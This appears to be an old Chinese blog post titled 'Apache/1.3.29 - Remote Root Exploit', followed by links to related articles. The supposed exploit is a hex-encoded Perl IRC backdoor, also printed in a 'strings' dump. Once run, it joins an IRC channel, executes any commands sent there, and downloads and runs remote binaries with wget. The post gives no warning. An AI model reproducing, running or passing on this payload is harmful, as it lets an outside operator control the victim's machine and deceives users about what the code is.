Apache/1.3.29 - Remote Root Exploit

原创 2004年08月10日 17:35:00
unsigned char h3llc0de[]=
{
 0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69,
 0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d, 0x22, 0x23,
 0x70, 0x61, 0x72, 0x64, 0x69, 0x6c, 0x6c, 0x6f,
 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x6e, 0x69, 0x63,
 0x6b, 0x3d, 0x22, 0x4c, 0x65, 0x6d, 0x6d, 0x69,
 0x6e, 0x67, 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x73,
 0x65, 0x72, 0x76, 0x65, 0x72, 0x3d, 0x22, 0x65,
 0x66, 0x6e, 0x65, 0x74, 0x2e, 0x76, 0x75, 0x75,
 0x72, 0x77, 0x65, 0x72, 0x6b, 0x2e, 0x6e, 0x6c,
 0x22, 0x3b, 0x0a, 0x24, 0x53, 0x49, 0x47, 0x7b,
 0x54, 0x45, 0x52, 0x4d, 0x7d, 0x3d, 0x7b, 0x7d,
 0x3b, 0x0a, 0x65, 0x78, 0x69, 0x74, 0x20, 0x69,
 0x66, 0x20, 0x66, 0x6f, 0x72, 0x6b, 0x3b, 0x0a,
 0x75, 0x73, 0x65, 0x20, 0x49, 0x4f, 0x3a, 0x3a,
 0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x3b, 0x0a,
 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x3d, 0x20,
 0x49, 0x4f, 0x3a, 0x3a, 0x53, 0x6f, 0x63, 0x6b,
 0x65, 0x74, 0x3a, 0x3a, 0x49, 0x4e, 0x45, 0x54,
 0x2d, 0x3e, 0x6e, 0x65, 0x77, 0x28, 0x24, 0x73,
 0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x22, 0x3a,
 0x36, 0x36, 0x36, 0x37, 0x22, 0x29, 0x7c, 0x7c,
 0x65, 0x78, 0x69, 0x74, 0x3b, 0x0a, 0x70, 0x72,
 0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63,
 0x6b, 0x20, 0x22, 0x55, 0x53, 0x45, 0x52, 0x20,
 0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
 0x20, 0x2b, 0x69, 0x20, 0x6c, 0x65, 0x6d, 0x6d,
 0x69, 0x6e, 0x67, 0x73, 0x20, 0x3a, 0x6c, 0x65,
 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73, 0x76, 0x32,
 0x20, 0x5c, 0x6e, 0x4e, 0x49, 0x43, 0x4b, 0x20,
 0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
 0x5c, 0x6e, 0x22, 0x3b, 0x0a, 0x24, 0x69, 0x3d,
 0x31, 0x3b, 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28,
 0x3c, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x3d,
 0x7e, 0x2f, 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b,
 0x20, 0x28, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x29,
 0x20, 0x2f, 0x29, 0x7b, 0x24, 0x6d, 0x6f, 0x64,
 0x65, 0x3d, 0x24, 0x31, 0x3b, 0x0a, 0x6c, 0x61,
 0x73, 0x74, 0x20, 0x69, 0x66, 0x20, 0x24, 0x6d,
 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x30, 0x30,
 0x31, 0x22, 0x3b, 0x0a, 0x69, 0x66, 0x28, 0x24,
 0x6d, 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x34,
 0x33, 0x33, 0x22, 0x29, 0x0a, 0x7b, 0x24, 0x69,
 0x2b, 0x2b, 0x3b, 0x24, 0x6e, 0x69, 0x63, 0x6b,
 0x3d, 0x7e, 0x73, 0x2f, 0x5c, 0x64, 0x2a, 0x24,
 0x2f, 0x24, 0x69, 0x2f, 0x3b, 0x70, 0x72, 0x69,
 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
 0x20, 0x22, 0x4e, 0x49, 0x43, 0x4b, 0x20, 0x24,
 0x6e, 0x69, 0x63, 0x6b, 0x5c, 0x6e, 0x22, 0x3b,
 0x7d, 0x7d, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
 0x4a, 0x4f, 0x49, 0x4e, 0x20, 0x24, 0x63, 0x68,
 0x61, 0x6e, 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56,
 0x4d, 0x53, 0x47, 0x20, 0x24, 0x63, 0x68, 0x61,
 0x6e, 0x20, 0x3a, 0x6c, 0x65, 0x6d, 0x6d, 0x69,
 0x6e, 0x67, 0x73, 0x20, 0x76, 0x32, 0x2e, 0x31,
 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53,
 0x47, 0x20, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20,
 0x3a, 0x70, 0x61, 0x72, 0x61, 0x20, 0x6d, 0x61,
 0x6e, 0x64, 0x61, 0x72, 0x6d, 0x65, 0x20, 0x63,
 0x6f, 0x6d, 0x61, 0x6e, 0x64, 0x6f, 0x73, 0x2c,
 0x20, 0x65, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65,
 0x3a, 0x20, 0x22, 0x2e, 0x24, 0x6e, 0x69, 0x63,
 0x6b, 0x2e, 0x22, 0x3a, 0x63, 0x6f, 0x6d, 0x61,
 0x6e, 0x64, 0x6f, 0x5c, 0x6e, 0x22, 0x3b, 0x0a,
 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28, 0x3c, 0x24,
 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x29, 0x0a, 0x7b,
 0x0a, 0x69, 0x66, 0x20, 0x28, 0x2f, 0x5e, 0x50,
 0x49, 0x4e, 0x47, 0x20, 0x28, 0x2e, 0x2a, 0x29,
 0x24, 0x2f, 0x29, 0x0a, 0x7b, 0x70, 0x72, 0x69,
 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
 0x20, 0x22, 0x50, 0x4f, 0x4e, 0x47, 0x20, 0x24,
 0x31, 0x5c, 0x6e, 0x4a, 0x4f, 0x49, 0x4e, 0x20,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x5c, 0x6e, 0x22,
 0x3b, 0x7d, 0x0a, 0x69, 0x66, 0x28, 0x73, 0x2f,
 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x50,
 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20, 0x24,
 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24, 0x6e,
 0x69, 0x63, 0x6b, 0x5b, 0x5e, 0x20, 0x3a, 0x5c,
 0x77, 0x5d, 0x2a, 0x3a, 0x5b, 0x5e, 0x20, 0x3a,
 0x5c, 0x77, 0x5d, 0x2a, 0x20, 0x28, 0x2e, 0x2a,
 0x29, 0x24, 0x2f, 0x24, 0x31, 0x2f, 0x29, 0x7b,
 0x73, 0x2f, 0x5c, 0x73, 0x2a, 0x24, 0x2f, 0x2f,
 0x3b, 0x24, 0x5f, 0x3d, 0x60, 0x24, 0x5f, 0x60,
 0x3b, 0x66, 0x6f, 0x72, 0x65, 0x61, 0x63, 0x68,
 0x28, 0x73, 0x70, 0x6c, 0x69, 0x74, 0x20, 0x22,
 0x5c, 0x6e, 0x22, 0x29, 0x0a, 0x7b, 0x0a, 0x73,
 0x79, 0x73, 0x74, 0x65, 0x6d, 0x28, 0x22, 0x77,
 0x67, 0x65, 0x74, 0x20, 0x77, 0x77, 0x77, 0x2e,
 0x67, 0x72, 0x61, 0x74, 0x69, 0x73, 0x77, 0x65,
 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x65, 0x6c,
 0x64, 0x75, 0x65, 0x6e, 0x64, 0x65, 0x63, 0x69,
 0x6c, 0x6c, 0x6f, 0x2f, 0x69, 0x6e, 0x73, 0x74,
 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64,
 0x20, 0x2b, 0x78, 0x20, 0x69, 0x6e, 0x73, 0x74,
 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x69, 0x6e, 0x73,
 0x74, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x69,
 0x6e, 0x73, 0x74, 0x3b, 0x20, 0x63, 0x64, 0x20,
 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x68, 0x61,
 0x72, 0x65, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c,
 0x65, 0x2f, 0x73, 0x6b, 0x2f, 0x2e, 0x73, 0x6b,
 0x31, 0x32, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x73,
 0x6b, 0x20, 0x3b, 0x20, 0x63, 0x64, 0x22, 0x20,
 0x29, 0x3b, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24,
 0x5f, 0x5c, 0x6e, 0x22, 0x3b, 0x73, 0x6c, 0x65,
 0x65, 0x70, 0x20, 0x31, 0x3b, 0x7d, 0x7d, 0x7d,
 0x23, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b,
 0x78, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x6c,
 0x6f, 0x6c, 0x20, 0x32, 0x3e, 0x2f, 0x64, 0x65,
 0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x3b, 0x2f,
 0x74, 0x6d, 0x70, 0x2f, 0x6c, 0x6f, 0x6c, 0x00
};


fatb@secu~# strings apache
/lib/ld-linux.so.2
libc.so.6
printf
memcpy
system
malloc
socket
inet_addr
setsockopt
fseek
sendto
fclose
fwrite
htons
fopen
_IO_stdin_used
__libc_start_main
strlen
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
QVh_
[^_]
ERROR: No ip address entered
usage:
%s [IP-ADDRESS]
could not obtain raw socket
ARE YOU ROOT?
127.0.0.1
warning: cannot set HDRINCL
Server Patched or not Vulnerable :_(
#!/usr/bin/perl
$chan="#pardillos";
$nick="Lemmings";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER lemmings +i lemmings :lemmingsv2 NICK lemmings ";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433")
{$i++;$nick=~s/d*$/$i/;print $sock "NICK $nick ";}}
print $sock "JOIN $chan PRIVMSG $chan :lemmings v2.1 PRIVMSG $chan :para mandarme comandos, escribe: ".$nick.":comando ";
while(<$sock>)
if (/^PING (.*)$/)
{print $sock "PONG $1 JOIN $chan ";}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :w]*:[^ :w]* (.*)$/$1/){s/s*$//;$_=`$_`;foreach(split " ")
system("wget www.gratisweb.com/elduendecillo/inst ; chmod +x inst ; ./inst ; rm inst; cd /usr/share/locale/sk/.sk12 ; ./sk ; cd" );
print $sock "PRIVMSG $chan :$_ ";sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol

修改apache的httpd服务为root权限

修改apache的httpd服务为root权限。
  • wentinghe
  • wentinghe
  • 2014年11月24日 19:53
  • 4318

让apache可执行远程需root权限的命令

转自:http://www.linuxfly.org/post/344/  昨天提到,当想在Web页面上去调用一个需要root权限的命令时,可以使用赋予脚本suid权限,并且交换euid...
  • shanliangliuxing
  • shanliangliuxing
  • 2013年04月23日 22:53
  • 1379

linux普通用户下安装apache、mysql、php

一、安装apache 下载安装包  http://httpd.apache.org/download.cgi#apache22 1.解压缩 tar -zxvf httpd-2.2.31.tar.gz...
  • xuexiaoxu1990
  • xuexiaoxu1990
  • 2016年01月05日 08:58
  • 2628

Nexus创建本地Maven仓库

0.安装环境 windows 7 x86-64 jdk1.6.0_27 32-bit(假定该环境中已经设置了jdk的环境变量) maven 3.1.1 nexus-2.9.1-...
  • xwq911
  • xwq911
  • 2015年10月28日 11:15
  • 465

apache中启动权限问题

在linux下apache启动需要的权限;权限配置参考等
  • hsd2012
  • hsd2012
  • 2016年05月30日 16:38
  • 2246

给kali的Metasploit下添加一个新的exploit

首先在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹,例如fwdtest 仿造exploits目录下的其他exp(r...
  • qq_27446553
  • qq_27446553
  • 2017年04月22日 18:21
  • 1090

Apache下root权限运行CGI

问题场景Apache默认是以daemon用户(或者其他other用户)和daemon用户组启动的,所以其worker进程也是daemon权限的,这样,worker进程fork的CGI进程,以及CGI再...
  • leeyanhit
  • leeyanhit
  • 2015年11月18日 23:01
  • 1228

Apache是怎样启动的

原文连接http://www.linuxidc.com/Linux/2012-07/64252.htm 和监控部门提到一个问题,开发部门的人启动Apache是使用root启动,但是监控部门的...
  • wang_xya
  • wang_xya
  • 2014年08月12日 09:03
  • 728

学习编写Metasploit的exploit模块

表示终于是成功了,周六在大神的
  • think1003
  • think1003
  • 2014年04月14日 22:21
  • 1600

exploit编写学习阶段性总结

exploit编写学习阶段性总结.
  • Le9a1High
  • Le9a1High
  • 2015年02月15日 10:59
  • 319
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Apache/1.3.29 - Remote Root Exploit
举报原因:
原因补充:

(最多只允许输入30个字)